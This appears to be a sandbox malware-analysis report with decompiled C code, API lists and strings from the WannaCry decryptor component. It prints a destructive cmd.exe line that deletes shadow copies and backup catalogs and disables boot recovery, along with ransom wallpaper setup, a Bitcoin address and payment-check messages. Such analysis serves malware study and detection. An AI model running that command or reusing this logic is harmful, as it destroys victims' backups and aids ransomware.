					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
					CopyFileW( &_v540, _t55, 0); // executed
					return SystemParametersInfoW(0x14, 0, _t55, 1);
				} else {
					return _t23;
				}
			}

















                                  0x00407e86
                                  0x00407e9c
                                  0x00407ea4
                                  0x00407ea6
                                  0x00407eb3
                                  0x00407eb8
                                  0x00407eba
                                  0x00407eca
                                  0x00407ed2
                                  0x00407ed4
                                  0x00407ee6
                                  0x00407ef4
                                  0x00407efa
                                  0x00407f00
                                  0x00407f10
                                  0x00407f20
                                  0x00407f26
                                  0x00407f41
                                  0x00407f56
                                  0x00407f73
                                  0x00407f08
                                  0x00407f08
                                  0x00407f08

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
                                  • wcslen.MSVCRT ref: 00407EF4
                                  • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
                                  • CopyFileW.KERNELBASE(?,?,00000000), ref: 00407F56
                                  • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
                                  • String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
                                  • API String ID: 13424474-2236924158
                                  • Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                  • Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
                                  • Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                  • Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406C20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E00406C20(void* __ecx) {
				void _v51;
				void* _v52;
				signed int _t14;
				long _t17;
				void* _t26;
				char* _t30;
				unsigned int _t36;
				signed int _t37;
				void* _t55;

				_t26 = __ecx;
				_v52 = 0;
				memset( &_v51, 0, 0xc << 2);
				asm("stosb");
				_t14 = GetUserDefaultLangID();
				_t30 =  &_v52;
				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
					asm("repne scasb");
					_t36 =  !(_t30 | 0xffffffff);
					_t55 = "English" - _t36;
					_t37 = _t36 >> 2;
					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
				}
				_t17 = SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52); // executed
				if(_t17 != 0xffffffff) {
					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52); // executed
					return E00406AE0(_t26);
				} else {
					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
					return E00406AE0(_t26);
				}
			}












                                  0x00406c25
                                  0x00406c33
                                  0x00406c38
                                  0x00406c3a
                                  0x00406c3b
                                  0x00406c41
                                  0x00406c5b
                                  0x00406c65
                                  0x00406c67
                                  0x00406c71
                                  0x00406c75
                                  0x00406c7f
                                  0x00406c7f
                                  0x00406c9a
                                  0x00406c9f
                                  0x00406cd4
                                  0x00406ce3
                                  0x00406ca1
                                  0x00406cb1
                                  0x00406cc0
                                  0x00406cc0

                                  APIs
                                  • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
                                  • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
                                  • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
                                  • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
                                    • Part of subcall function 00406AE0: #540.MFC42(?,765920C0), ref: 00406B03
                                    • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
                                    • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
                                    • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
                                    • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
                                    • Part of subcall function 00406AE0: #800.MFC42(?,?,765920C0), ref: 00406B62
                                    • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
                                    • Part of subcall function 00406AE0: GetFileAttributesA.KERNELBASE(?), ref: 00406B7D
                                    • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
                                    • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
                                    • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
                                    • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,765920C0), ref: 00406BC4
                                    • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
                                    • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
                                  • String ID: English
                                  • API String ID: 600832625-3812506524
                                  • Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                  • Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
                                  • Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                  • Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004064D0 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 256stringwindowtimeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 87 4064d0-40651b #4710 SendMessageA * 2 call 401c70 90 406577-40658a call 401a10 87->90 91 40651d-40655b GetModuleFileNameA strrchr 87->91 96 4065e8-406609 call 402c40 __p___argc 90->96 97 40658c-4065e5 time call 401a10 90->97 92 40656c-406571 SetCurrentDirectoryA 91->92 93 40655d-406569 strrchr 91->93 92->90 93->92 103 40678c-4067ef call 407e80 SetWindowTextW call 406f80 call 406c20 SetTimer * 2 96->103 104 40660f-40661e __p___argv 96->104 97->96 106 406621-406629 104->106 107 406649-40664b 106->107 108 40662b-40662d 106->108 112 40664e-406650 107->112 110 406645-406647 108->110 111 40662f-406639 108->111 110->112 111->107 114 40663b-406643 111->114 115 406661-40666a __p___argv 112->115 116 406652-40665b call 407f80 ExitProcess 112->116 114->106 114->110 119 40666d-406675 115->119 122 406695-406697 119->122 123 406677-406679 119->123 125 40669a-40669c 122->125 126 406691-406693 123->126 127 40667b-406685 123->127 128 4066ad-4066b6 __p___argv 125->128 129 40669e-4066a7 call 4080c0 ExitProcess 125->129 126->125 127->122 130 406687-40668f 127->130 132 4066b9-4066c1 128->132 130->119 130->126 134 4066e1-4066e3 132->134 135 4066c3-4066c5 132->135 138 4066e6-4066e8 134->138 136 4066c7-4066d1 135->136 137 4066dd-4066df 135->137 136->134 139 4066d3-4066db 136->139 137->138 138->103 140 4066ee-406736 Sleep call 401bb0 138->140 139->132 139->137 143 406750-406781 sprintf call 401a90 140->143 144 406738-40674e call 401b50 140->144 149 406784-406786 ExitProcess 143->149 144->149
                                  C-Code - Quality: 71%
                                  			E004064D0(intOrPtr __ecx, void* __fp0) {
				char _v1032;
				char _v1424;
				void _v2256;
				void _v2456;
				void _v2707;
				char _v2708;
				intOrPtr _v2720;
				short _v2724;
				int _t48;
				int _t49;
				intOrPtr* _t50;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				short _t70;
				void* _t82;
				char* _t87;
				char* _t89;
				intOrPtr _t90;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t105;
				char _t122;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr* _t140;
				intOrPtr* _t141;
				intOrPtr* _t142;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				void* _t165;
				void* _t167;
				intOrPtr* _t168;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t201;

				_t201 = __fp0;
				_t90 = __ecx; // executed
				L00412CB0(); // executed
				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
				_t48 = E00401C70(0);
				_t170 = _t169 + 4;
				if(_t48 == 0) {
					_t122 =  *0x421798; // 0x0
					_v2708 = _t122;
					memset( &_v2707, _t48, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetModuleFileNameA(0,  &_v2708, 0x104);
					_t87 = strrchr( &_v2708, 0x5c);
					_t170 = _t170 + 0x14;
					if(_t87 != 0) {
						_t89 = strrchr( &_v2708, 0x5c);
						_t170 = _t170 + 8;
						 *_t89 = 0;
					}
					SetCurrentDirectoryA( &_v2708);
				}
				_t167 = _t90 + 0x50c;
				_t49 = E00401A10(_t167, 1);
				_t171 = _t170 + 8;
				if(_t49 == 0) {
					memset(_t167, _t49, 0xc3 << 2);
					asm("repne scasb");
					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
					 *(_t90 + 0x588) = 0;
					__imp__time(0);
					 *(_t90 + 0x578) = _t82;
					E00401A10(_t167, 0);
					_t171 = _t171 + 0x30;
				}
				_t50 = E00402C40();
				__imp__#115(0x202,  &_v1424); // executed
				__imp____p___argc();
				if( *_t50 > 1) {
					_t168 = __imp____p___argv;
					_t140 = "fi";
					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
					while(1) {
						_t98 =  *_t161;
						_t60 = _t98;
						if(_t98 !=  *_t140) {
							break;
						}
						if(_t60 == 0) {
							L12:
							_t60 = 0;
						} else {
							_t136 =  *((intOrPtr*)(_t161 + 1));
							_t22 = _t140 + 1; // 0x31000069
							_t60 = _t136;
							if(_t136 !=  *_t22) {
								break;
							} else {
								_t161 = _t161 + 2;
								_t140 = _t140 + 2;
								if(_t60 != 0) {
									continue;
								} else {
									goto L12;
								}
							}
						}
						L14:
						if(_t60 == 0) {
							E00407F80(_t90);
							ExitProcess(0);
						}
						_t141 = "co";
						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
						while(1) {
							_t99 =  *_t162;
							_t63 = _t99;
							if(_t99 !=  *_t141) {
								break;
							}
							if(_t63 == 0) {
								L21:
								_t63 = 0;
							} else {
								_t135 =  *((intOrPtr*)(_t162 + 1));
								_t25 = _t141 + 1; // 0x6600006f
								_t63 = _t135;
								if(_t135 !=  *_t25) {
									break;
								} else {
									_t162 = _t162 + 2;
									_t141 = _t141 + 2;
									if(_t63 != 0) {
										continue;
									} else {
										goto L21;
									}
								}
							}
							L23:
							if(_t63 == 0) {
								E004080C0(_t90);
								ExitProcess(0);
							}
							_t142 = "vs";
							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
							while(1) {
								_t100 =  *_t163;
								_t66 = _t100;
								if(_t100 !=  *_t142) {
									break;
								}
								if(_t66 == 0) {
									L30:
									_t66 = 0;
								} else {
									_t134 =  *((intOrPtr*)(_t163 + 1));
									_t28 = _t142 + 1; // 0x63000073
									_t66 = _t134;
									if(_t134 !=  *_t28) {
										break;
									} else {
										_t163 = _t163 + 2;
										_t142 = _t142 + 2;
										if(_t66 != 0) {
											continue;
										} else {
											goto L30;
										}
									}
								}
								L32:
								if(_t66 == 0) {
									Sleep(0x2710);
									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
									_t70 = "cmd.exe"; // 0x2e646d63
									_t105 =  *0x420fd4; // 0x657865
									_v2724 = _t70;
									_v2720 = _t105;
									if(E00401BB0() != 0) {
										_push( &_v2456);
										_push( &_v2724);
										sprintf( &_v1032, "%s %s");
										E00401A90( &_v1032, 0, 0);
									} else {
										E00401B50( &_v2724,  &_v2456, _t71);
									}
									ExitProcess(0);
								}
								goto L37;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L32;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L23;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L14;
				}
				L37:
				E00407E80();
				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0"); // executed
				E00406F80(_t90, _t201);
				E00406C20(_t90);
				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0); // executed
				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0); // executed
				 *0x42189c = _t90;
				return 1;
			}











































                                  0x004064d0
                                  0x004064da
                                  0x004064dc
                                  0x004064f9
                                  0x0040650d
                                  0x00406511
                                  0x00406516
                                  0x0040651b
                                  0x0040651d
                                  0x00406527
                                  0x00406530
                                  0x00406532
                                  0x00406540
                                  0x00406541
                                  0x00406554
                                  0x00406556
                                  0x0040655b
                                  0x00406564
                                  0x00406566
                                  0x00406569
                                  0x00406569
                                  0x00406571
                                  0x00406571
                                  0x00406577
                                  0x00406580
                                  0x00406585
                                  0x0040658a
                                  0x00406593
                                  0x0040659d
                                  0x004065ab
                                  0x004065bb
                                  0x004065bd
                                  0x004065c7
                                  0x004065d1
                                  0x004065da
                                  0x004065e0
                                  0x004065e5
                                  0x004065e5
                                  0x004065e8
                                  0x004065fa
                                  0x00406600
                                  0x00406609
                                  0x0040660f
                                  0x00406615
                                  0x0040661e
                                  0x00406621
                                  0x00406621
                                  0x00406625
                                  0x00406629
                                  0x00000000
                                  0x00000000
                                  0x0040662d
                                  0x00406645
                                  0x00406645
                                  0x0040662f
                                  0x0040662f
                                  0x00406632
                                  0x00406635
                                  0x00406639
                                  0x00000000
                                  0x0040663b
                                  0x0040663b
                                  0x0040663e
                                  0x00406643
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406643
                                  0x00406639
                                  0x0040664e
                                  0x00406650
                                  0x00406654
                                  0x0040665b
                                  0x0040665b
                                  0x00406661
                                  0x0040666a
                                  0x0040666d
                                  0x0040666d
                                  0x00406671
                                  0x00406675
                                  0x00000000
                                  0x00000000
                                  0x00406679
                                  0x00406691
                                  0x00406691
                                  0x0040667b
                                  0x0040667b
                                  0x0040667e
                                  0x00406681
                                  0x00406685
                                  0x00000000
                                  0x00406687
                                  0x00406687
                                  0x0040668a
                                  0x0040668f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040668f
                                  0x00406685
                                  0x0040669a
                                  0x0040669c
                                  0x004066a0
                                  0x004066a7
                                  0x004066a7
                                  0x004066ad
                                  0x004066b6
                                  0x004066b9
                                  0x004066b9
                                  0x004066bd
                                  0x004066c1
                                  0x00000000
                                  0x00000000
                                  0x004066c5
                                  0x004066dd
                                  0x004066dd
                                  0x004066c7
                                  0x004066c7
                                  0x004066ca
                                  0x004066cd
                                  0x004066d1
                                  0x00000000
                                  0x004066d3
                                  0x004066d3
                                  0x004066d6
                                  0x004066db
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004066db
                                  0x004066d1
                                  0x004066e6
                                  0x004066e8
                                  0x004066f3
                                  0x0040671a
                                  0x0040671c
                                  0x00406721
                                  0x00406727
                                  0x0040672b
                                  0x00406736
                                  0x0040675b
                                  0x0040675c
                                  0x0040676a
                                  0x0040677c
                                  0x00406738
                                  0x00406746
                                  0x0040674b
                                  0x00406786
                                  0x00406786
                                  0x00000000
                                  0x004066e8
                                  0x004066e1
                                  0x004066e3
                                  0x00000000
                                  0x004066e3
                                  0x00406695
                                  0x00406697
                                  0x00000000
                                  0x00406697
                                  0x00406649
                                  0x0040664b
                                  0x00000000
                                  0x0040664b
                                  0x0040678c
                                  0x0040678e
                                  0x0040679c
                                  0x004067a4
                                  0x004067ab
                                  0x004067c6
                                  0x004067d8
                                  0x004067dc
                                  0x004067ef

                                  APIs
                                  • #4710.MFC42 ref: 004064DC
                                  • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
                                  • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
                                    • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
                                    • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                    • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                    • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                    • Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
                                  • strrchr.MSVCRT ref: 00406554
                                  • strrchr.MSVCRT ref: 00406564
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
                                  • time.MSVCRT ref: 004065D1
                                  • __p___argc.MSVCRT(00000202,?), ref: 004065FA
                                  • __p___argv.MSVCRT ref: 0040661A
                                  • ExitProcess.KERNEL32 ref: 0040665B
                                  • __p___argv.MSVCRT ref: 00406666
                                  • ExitProcess.KERNEL32 ref: 004066A7
                                  • __p___argv.MSVCRT ref: 004066B2
                                  • Sleep.KERNEL32(00002710), ref: 004066F3
                                  • sprintf.MSVCRT ref: 0040676A
                                  • ExitProcess.KERNEL32 ref: 00406786
                                  • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
                                  • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
                                  • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
                                  Strings
                                  • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
                                  • cmd.exe, xrefs: 0040671C
                                  • %s %s, xrefs: 00406764
                                  • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
                                  • Wana Decrypt0r 2.0, xrefs: 00406796
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
                                  • String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
                                  • API String ID: 623806192-606506946
                                  • Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                  • Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
                                  • Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                  • Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401760 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 140filesynchronizationthreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 150 401760-40178f #6453 151 401791-4017b2 WaitForSingleObject TerminateThread CloseHandle 150->151 152 4017b8-4017c3 call 40c670 150->152 151->152 155 4017c9-4017d2 152->155 156 40193e-401955 152->156 157 4018f6-4018f9 155->157 158 4017d8-40182e sprintf fopen 155->158 161 4018fb-401901 157->161 162 40192c-40192f 157->162 159 401834-4018d8 fread fclose DeleteFileA #537 #924 #1200 #800 * 2 158->159 160 4018da-4018f4 #1200 158->160 159->156 160->156 163 401903-401913 rand 161->163 164 40191f-40192a 161->164 162->156 165 401931-401934 162->165 163->164 166 401915-40191d 163->166 167 401939 #1200 164->167 165->167 166->167 167->156
                                  C-Code - Quality: 61%
                                  			E00401760(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				struct _IO_FILE* _v32;
				void _v2059;
				void _v2060;
				void _v2571;
				void _v2572;
				char _v2576;
				char _v2604;
				void* _v2608;
				char _v2616;
				void* _v2636;
				void* _v2640;
				void* _t36;
				struct _IO_FILE* _t37;
				signed int _t38;
				unsigned int _t45;
				signed int _t49;
				void* _t50;
				signed int _t67;
				struct _IO_FILE* _t87;
				void* _t94;
				void* _t97;
				intOrPtr _t98;
				void* _t99;

				_push(0xffffffff);
				_push(E004134C6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t98;
				_t99 = _t98 - 0xa28;
				_t94 = __ecx;
				L00412CD4();
				_t36 =  *(__ecx + 0xac);
				if(_t36 != 0) {
					WaitForSingleObject(_t36, 0xbb8);
					TerminateThread( *(_t94 + 0xac), 0); // executed
					CloseHandle( *(_t94 + 0xac));
				}
				_t37 = E0040C670();
				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
					L15:
					 *[fs:0x0] = _v12;
					return _t37;
				} else {
					_t37 =  *(_t94 + 0xa8);
					if(_t37 != 1) {
						if(_t37 != 0xffffffff) {
							if(_t37 != 2) {
								goto L15;
							}
							_push(0);
							_push(0x40);
							_push("Congratulations! Your payment has been checked!\nStart decrypting now!"); // executed
							L14:
							L00412CC8(); // executed
							goto L15;
						}
						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
							L11:
							_push(0);
							_push(0xf0);
							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
							goto L14;
						}
						_t38 = rand();
						asm("cdq");
						_t37 = _t38 / 3;
						if(_t38 % 3 != 0) {
							goto L11;
						}
						_push(0);
						_push(0x30);
						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
						goto L14;
					}
					_v2572 = 0;
					memset( &_v2571, 0, 0x7f << 2);
					asm("stosw");
					asm("stosb");
					_v2060 = 0;
					memset( &_v2059, 0, 0x1ff << 2);
					asm("stosw");
					asm("stosb");
					sprintf( &_v2604, "%08X.dky", 0);
					_t37 = fopen( &_v2604, "rb");
					_t87 = _t37;
					_t99 = _t99 + 0x2c;
					if(_t87 == 0) {
						_push(0);
						_push(0xf0);
						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
						L00412CC8();
						 *(_t94 + 0xa8) = 0xffffffff;
					} else {
						_t45 = fread( &_v2060, 1, 0x800, _t87);
						fclose(_t87);
						DeleteFileA( &_v2604);
						_t97 =  &_v2060;
						_t67 = _t45 >> 2;
						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
						_push("You have a new message:\n");
						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
						_t99 = _t99 + 0x2c;
						L00412CAA();
						_push( &_v2576);
						_push(_t50);
						_push( &_v2616);
						_v8 = 0;
						L00412CCE();
						_t37 =  *_t50;
						_push(0);
						_push(0x40);
						_push(_t37);
						_v20 = 1;
						L00412CC8();
						_v32 = 0;
						L00412CC2();
						_v32 = 0xffffffff;
						L00412CC2();
					}
					goto L15;
				}
			}





























                                  0x00401766
                                  0x00401768
                                  0x0040176d
                                  0x0040176e
                                  0x00401775
                                  0x0040177e
                                  0x00401780
                                  0x00401785
                                  0x0040178f
                                  0x00401797
                                  0x004017a5
                                  0x004017b2
                                  0x004017b2
                                  0x004017b8
                                  0x004017c3
                                  0x0040193e
                                  0x00401948
                                  0x00401955
                                  0x004017c9
                                  0x004017c9
                                  0x004017d2
                                  0x004018f9
                                  0x0040192f
                                  0x00000000
                                  0x00000000
                                  0x00401931
                                  0x00401932
                                  0x00401934
                                  0x00401939
                                  0x00401939
                                  0x00000000
                                  0x00401939
                                  0x00401901
                                  0x0040191f
                                  0x0040191f
                                  0x00401920
                                  0x00401925
                                  0x00000000
                                  0x00401925
                                  0x00401903
                                  0x00401909
                                  0x0040190f
                                  0x00401913
                                  0x00000000
                                  0x00000000
                                  0x00401915
                                  0x00401916
                                  0x00401918
                                  0x00000000
                                  0x00401918
                                  0x004017e3
                                  0x004017e7
                                  0x004017e9
                                  0x004017eb
                                  0x004017fa
                                  0x00401801
                                  0x00401803
                                  0x00401810
                                  0x00401811
                                  0x00401821
                                  0x00401827
                                  0x00401829
                                  0x0040182e
                                  0x004018da
                                  0x004018db
                                  0x004018e0
                                  0x004018e5
                                  0x004018ea
                                  0x00401834
                                  0x00401844
                                  0x0040184d
                                  0x0040185b
                                  0x00401863
                                  0x00401870
                                  0x00401873
                                  0x00401877
                                  0x0040187f
                                  0x0040187f
                                  0x00401885
                                  0x00401892
                                  0x00401893
                                  0x00401894
                                  0x00401895
                                  0x0040189c
                                  0x004018a1
                                  0x004018a3
                                  0x004018a4
                                  0x004018a6
                                  0x004018a7
                                  0x004018af
                                  0x004018b8
                                  0x004018bf
                                  0x004018c8
                                  0x004018d3
                                  0x004018d3
                                  0x00000000
                                  0x0040182e

                                  APIs
                                  • #6453.MFC42 ref: 00401780
                                  • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
                                  • TerminateThread.KERNELBASE(?,00000000), ref: 004017A5
                                  • CloseHandle.KERNEL32(?), ref: 004017B2
                                  • sprintf.MSVCRT ref: 00401811
                                  • fopen.MSVCRT ref: 00401821
                                  • fread.MSVCRT ref: 00401844
                                  • fclose.MSVCRT ref: 0040184D
                                  • DeleteFileA.KERNEL32(?), ref: 0040185B
                                  • #537.MFC42(You have a new message:), ref: 00401885
                                  • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
                                  • #1200.MFC42 ref: 004018AF
                                  • #800.MFC42 ref: 004018BF
                                  • #800.MFC42 ref: 004018D3
                                  • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
                                  Strings
                                  • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
                                  • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
                                  • %08X.dky, xrefs: 0040180A
